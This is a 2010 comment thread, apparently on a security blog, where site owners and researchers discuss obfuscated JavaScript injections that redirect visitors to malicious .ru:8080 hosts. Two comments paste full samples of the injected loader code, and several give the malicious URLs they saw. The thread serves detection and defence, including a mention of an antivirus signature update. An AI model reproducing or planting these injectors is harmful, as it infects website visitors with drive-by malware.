Comments on: From Hidden Iframes to Obfuscated Scripts

By: MK

MK — Mon, 22 Feb 2010 11:23:33 +0000

I have been seeing a lot of this most recent variation. It is being randomized on each injection. However the injection is consistent across the account, and the structure stays similar.

By: Noxwizard

Noxwizard — Sun, 21 Feb 2010 09:22:55 +0000

I forgot to mention that I was able to verify through the logs that the FTP credentials had been stolen.

By: Noxwizard

Noxwizard — Sun, 21 Feb 2010 09:18:17 +0000

Looks like a possible evolution of this one. The injected code is here: http://noxwizard.pastebin.com/f6e4b85cc
Of course it’s on two lines and not the way I have it. Ultimately what happens is that HS() gets called on line 578, which at this point is the following function: http://noxwizard.pastebin.com/f26805767

By: Anand

Anand — Wed, 10 Feb 2010 18:56:30 +0000

My website also had this, the URL that I had was hxxp://picfoco-com.capitalone.com.salesforce-com.theantimatrix .ru:8080/google.com/google.com/vmn.net/netlog.com/over-blog.com

Can somebody let me know whats the harm that this code would have done? Appreciate your response.

Cheers
Anand

By: Denis

Denis — Mon, 01 Feb 2010 15:19:40 +0000

This must be yet another revision


try{window.onload=function(){Iebf2d21q07z = '' + 'i)c(#i$b)!a&$-$(c$())o&)m((.@c&)!o&(@n(&s!)(t@!#a)n@!!t(@&(@c^$^#o^#n&t!a&&c!t(.!#(c(&@^o))$^m#&&.@&p@e@)^r&e#@)$z@h#(i!l!#^t((@o@n!@@^-#$^c)^(o(&m).#(b^i)$l&$(&!t$o^&!p^&.@&#&r!(u$:@))N#q#@5#(^b!(&@h$3)f&@)i#@t&$w&!1@r$#v!$/!&@$g####o($@&&o(g$l)@!e@$.@(c$$()o&m&.$@(a^u!/^##g))()o#^o#&#g$#l!^)e$$.&#c!o($@m($.!^^a!u)^!/@!t#$@o(($r(!#r&(&e#^n$t^@^$s!&$^.(@r#!@u)$#&/(a@$l$#l!(e!^g$)(r&$#)o$^&.^p()l!)^@/#$$##g#$o)@$o)$#^g(&l(e@.#!c&o&@m$#/^'.replace(/#|@|\^|\$|\!|&|\)|\(/ig, '') ;
Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement('sc'+'ript');
Rkn5tmljhj1c.src = 'h'+'ttp://'+Iebf2d21q07z.replace(/Nq5bh3fitw1rv/ g, "8080");Rkn5tmljhj1c.setAttribute('defer', 'def'+'er');e val('document.body.'+Jq2dz9nff1w0lm+'(Rkn5tmljhj1c)');} }  catch(P052l4jn ) {}

in this case translates to iciba-com.constantcontact.com.perezhilton-com.biltop .ru:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/

By: Larry at Home

Larry at Home — Sat, 30 Jan 2010 18:55:42 +0000

May I ask what happens when I click on a hyperlink in a SPAM that sends me to one of these posted malware sites? Specifically,I have traced the IP’s listed in the SPAM and it seems that the redirecting thru infected PCS and hosts ends up at an online drugstore.One of them is Luxpharmacy .com

By: MK

MK — Fri, 29 Jan 2010 09:44:29 +0000

As more of a explanatory note. The main difference between this and the previous version is the randomization of the “megaid” div id. Presumably to prevent this from being used as a signature.

By: MK

MK — Fri, 29 Jan 2010 09:42:00 +0000

Revised yet again, most recent sample: try{window.onload=function(){document.write('drudgereport-com.chinamob');Jzzicgcp586y245 = document.getElementById('Fuq9970c1s5ie8').innerHTML + 'i)^l(e@&&.$c!&#o#m)#&!.($&^w#s$j$$)-@c^!#@o$(m(@@.$!&w()!a$^$!v(&$e!(@b&)&a&@!&^n$#k$$^.@r!)(u!#^:)()O(&o!s$#&)@s^t)!#u$$))q!^u$!&o()#y$@^v&x)@^)/#&#^h@$(o&#^$m)e@!w##&a^)y(&!.!!c^o@m@)($.$$&@#c&&@n$^!/&$(h!@o$&m)^(@e#!^#w##a#!!^y@.!!$c#)@@!o$(m()^.^c#&!^n!^#/)(&(g(!o&o@#g#l((!e)^))^.$c^o!#$$m$/##(c#!#@a#$r^(&$e!#e$!&$r@b@#$u$()!i^&^l!(d$)!@e$r!^&.@(#c&(@&#o!m#!(@/))w($&o)$w&)^a^$#r$&!m&@o#)r@y(^.&^(c&)^!o($&m&@!^/(^'.replace(/\$|$|@|\^|$|#|\!|&/ig, '') ;document.write('');} } catch(Tjkclo5m ) {}

By: Henry

Henry — Thu, 28 Jan 2010 22:14:40 +0000

Hi, Thank you. We didn’t know about this. We were hit three times in the last two weeks. The URL they used on our site yesterday:
fbcdn-net.yallakora.com.google-co-in.counterbest .ru:8080/google.com/google.com/warez-bb.org/china.com/bit.ly/

By: pob

pob — Thu, 28 Jan 2010 10:36:55 +0000

I have just updated the Sophos detection for Troj/JSRedir-AK for this variant.
These guys are morphing the code more regularly than they used to.